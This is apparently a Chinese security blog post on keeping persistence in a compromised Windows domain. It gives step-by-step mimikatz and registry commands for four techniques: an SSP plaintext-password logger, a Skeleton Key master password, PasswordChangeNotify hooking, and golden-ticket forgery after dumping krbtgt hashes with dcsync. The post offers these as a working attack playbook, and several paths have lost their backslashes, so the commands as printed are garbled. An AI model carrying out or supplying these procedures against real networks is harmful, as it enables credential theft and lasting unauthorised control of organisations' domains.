• 【域渗透】域权限维持


    一、ssp密码记录

    ssp(security Support Provider),一个用于身份验证的 dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中,由于 lsa 可扩展,导致在系统启动时我们可以加载一个自定义的 dll,一个用于记录所有登录到当 前系统的明文账号密码的 dll, 利用mimikatz 中mimilib.dll 文件。

    把 mimikatz 中的 mimilib.dll 传到目标域控的 c:windowssystem32目录下

    copy mimilib.dll %systemroot%system32

    reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages" 

    reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /t REG_MULTI_SZ 

      重启成功,如果有用户成功登录到当前系统中,会在 c:windowssystem32 目录下生成一个用于记录登账账号密码的 kiwissp.log 文件

     

    (2)利用方式二 ,利用进程注入,无需重启立即开启密码记录,重启则计算机失效

    mimikatz privilege::debug

    mimikatz misc::memssp

    type C:WindowsSystem32mimilsa.log 

    二、Skeleton Key

    Skeleton Key被安装在64位的域控服务器上,支持Windows Server2003—Windows Server2012 R2,能够让所有域用户使用同一个万能密码进行登录,现有的所有域用户使用原密码仍能继续登录,注意并不能更改用户权限,重启后失效。

    mimikaz执行命令:privilege::debug、misc::skeleton

    mimikatz的默认Skeleton Key设置为mimikatz(坑点:使用主机名链接)

    net use \WIN-6HQC11EJBDP.yiwang.comc$ /user:"yiwangadministrator" "mimikatz"

     二.Hook PasswordChangeNotify

    Hook PasswordChangeNotify 拦截修改的帐户密码,当修改域控密码时,LSA 首先会去调用 PasswordFileter 来判断新密码是否符合密码复杂度要求,如果符合,LSA 则会接着去调用 PasswordChangeNotify 在系统上同步更新密码,而函数 PasswordChangeNotify 存在于 rassfm.dll,rassfm.dll可理解为Remote Access Subauthentication dll,只存在于在Server系统下,xp、win7、win8等均不存在。

    三.黄金票据

    域内的一台机器向某一台服务器发起请求,请求首先会发被发送到kdc(域控)主机进行as认证,认证成功回返回tgt给客户机,然后客户机会接着拿这个tgt去向kdc中的tgs去请求,最后获取ticket,TGT是根据指定的 user[域内用户],domain[域名],timestamp[时间戳],外加一系列权限信息经过 krbtgt 这个域账户的 ntlm hash 加密后的结果,所以我们只要获取到相应的域用户名,域名,域 SID,以及 krbtgt 账户的 ntlm hash 就可以生成"黄金票据",因为可以拿着 krbtgt ntlm  hash 或者 aes key 伪造域内任意用户 TGT,就可以完整访问域内的任意机器。

    域管权限下导出域内所有域用户的 ntlm hash 

    mimikatz lsadump::dcsync /domain:yiwang/all /csv 

    图.jpg

    导出指定域用户的 ntlm hash 和 aes key,krbtgt 

    mimikatz lsadump::dcsync /domain:yiwang.com /user:krbtgt

    当前域的域名 yiwang.com

    当前域的 sid S-1-5-21-1650053798-3901349794-3227671014-500  whoami /user

    Krbtgt 的 ntlm hash 或者对应的 aes key 1a22505e768e7c590b3923a4f3a31502

    指定域用户,通常情况下直接写 administrator 即可 administrator 指定域用户

    rid,一般直接写 500 即可 50

    mimikatz kerberos::golden /admin:administrator /domain:yiwang.com /id:500 /sid:S-1-5-21-1650053798-3901349794-3227671014-500 /krbtgt:1a22505e768e7c590b3923a4f3a31502 /ptt

    访问域控dir \dc$ (DC主机名)c$ 一定得主机名

  • 相关阅读:
    4 weekend110的textinputformat对切片规划的源码分析 + 倒排索引的mr实现 + 多个job在同一个main方法中提交
    3 weekend110的shuffle机制 + mr程序的组件全貌
    2 weekend110的hadoop的自定义排序实现 + mr程序中自定义分组的实现
    1 weekend110的复习 + hadoop中的序列化机制 + 流量求和mr程序开发
    weekend110(Hadoop)的 第四天笔记
    4 weekend110的YARN的通用性意义 + yarn的job提交流程
    3 weekend110的job提交的逻辑及YARN框架的技术机制 + MR程序的几种提交运行模式
    Caused by: java.lang.ClassNotFoundException: org.objectweb.asm.ClassVisitor
    Android SDK 和 Eclipse ADT 离线安装 教程
    leetcode——Evaluate Reverse Polish Notation 求算式值(AC)
  • 原文地址:https://www.cnblogs.com/websecyw/p/11804624.html
Copyright © 2020-2023  润新知